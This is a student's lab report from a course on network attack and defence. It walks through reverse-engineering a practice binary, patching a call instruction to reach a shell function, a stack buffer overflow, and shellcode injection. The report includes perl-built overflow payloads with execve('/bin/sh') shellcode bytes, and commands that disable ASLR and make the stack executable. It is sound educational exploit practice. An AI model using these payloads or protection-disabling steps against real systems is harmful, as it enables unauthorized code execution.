20175303柴轩达 2019-2020-2 《网络对抗技术》Exp1 PC平台逆向破解

20175303柴轩达 2019-2020-2 《网络对抗技术》Exp1 PC平台逆向破解

目录

• 20175303柴轩达 2019-2020-2 《网络对抗技术》Exp1 PC平台逆向破解
  • 任务一 手动修改机器指令，改变程序执行流程
  • 任务二 通过构造输入值，造成BOF攻击，从而改变程序执行顺序
  • 任务三 注入shellcode并执行

任务一 手动修改机器指令，改变程序执行流程

1.在老师云班课网页链接里找到pwn1，下载到共享文件夹里
2.打开kali虚拟机终端，通过mkdir -p命令新建多级目录,通过cp命令将共享文件夹的pwn复制到新建目录里，再通过cp命令备份pwn1为pwn1.bak，以便出现问题后或做任务二三时，不用重新下载复制

3.通过objdump -d pwn1 | more命令对pwn1反汇编

4.汇编指令出来后，回车查看更多，翻到getshell、foo与main函数查看其地址，main函数call的地址是8048491即foo函数的首地址，getshell的首地址是804847d。call的机器指令为e8 7dffffff，e8为call的机器指令，7dffffff即0xffffff7d是关于eip寄存器地址的偏移地址即等于eip寄存器指令存放下条指令地址0x80484ba-目的地址0x8048491

5.现任务是将call的地址改为getshell的首地址804847d，所以应该将机器指令e8 7dffffff的地址部分换成0x80484ba-0x804847d=0xffffffc3即c3ffffff，通过vi pwn1命令对pwn1文件进行编辑,可以看到文件内容是16进制，可以通过：%！xxd将文件内容转换成可以读懂的ASCII码

6.转换成ASCII码之后，通过输入/e8 7d可以查找main函数call指令的机器代码

7.将光标定位在7上按r输入c，光标定位在d上按r输入3，然后输入%！xxd -r将ASCII代码转换为16进制

8.输入:wq保存退出

9.此时再反汇编查看main函数call的函数已经变为getshell

10.运行pwn1，主函数会调用getshell函数

任务二 通过构造输入值，造成BOF攻击，从而改变程序执行顺序

1.将备份的pwn1.bak还原命名为pwn2，并对pwn2进行反汇编

2.可以看到，main函数为foo函数输入的预留空间为0x1c，即28字节，加上ebp寄存器的4字节，所以eip寄存器的值应为33-36字节的值

3.使用gdb pwn2命令调试程序，输入r运行，输入40个字符会发生缓冲区溢出，显示Segmentation Fault。其中的33-36个字符‘1234’会覆盖eip寄存器的值，用info r查看寄存器的值，eip为0x34333231，若将eip的值构造为0804847d就可以在foo函数执行完回到main函数时进入到getshell函数

4.无法从键盘输入16进制的值，所以用perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input命令构造出16进制地址并将输入内容放进input文件里。地址应倒过来写，\0a是换行。

5.通过(cat input; cat ) | ./pwn2pwn2并将input里边的内容输入到pwn2运行的程序中，就可以跳到getshell函数中

任务三 注入shellcode并执行

1.将pwn1.bak还原并命名为pwn3

2.下载execstack

3.准备工作
execstack -s pwn3 设置堆栈可执行
execstack -q pwn3 查询文件的堆栈是否可执行，结果为X表示可执行
more /proc/sys/kernel/randomize_va_space 查看随机化是否关闭
echo "0" > /proc/sys/kernel/randomize_va_space 关闭随机化
more /proc/sys/kernel/randomize_va_space 再次查看，结果为0证明已关闭

4.通过perl -e 'print "A" x 32;print"\xd0\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode构造老师给的shellcode，并将shellcode保存到input_shellcode

5.打开两个终端，在第一个终端中输入(cat input_shellcode;cat) | ./pwn3运行pwn3，在第二个终端中输入ps -ef | grep pwn3查看pwn3的进程号为2967

6.接下来通过gdb命令开始调试，输入attach 2967连接到pwn3进程，连接后输入disassemble foo对foo函数进行反汇编查看foo函数return指令的地址为0x080448ae，然后输入break *0x080448ae再此处设置断点

7.在终端a中回车，程序会执行到断点处，在b终端输入c在断点处继续运行，此时输入info r esp查看esp寄存器的值为0xffffd21c
输入x/16x 0xffffd21c以16进制形式查看0xffffd21c地址后面16字节的内容是在最开始构造的input_shellcode里的内容，所以将shellcode注入地址为0xffffd21c+0x00000004=0xffffd220

8.通过perl -e 'print "A" x 32;print"\x20\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode重新构造改完注入地址的input_shellcode，并输入(cat input_shellcode;cat) | ./pwn3运行pwn3，可以跳到构造的shellcode程序中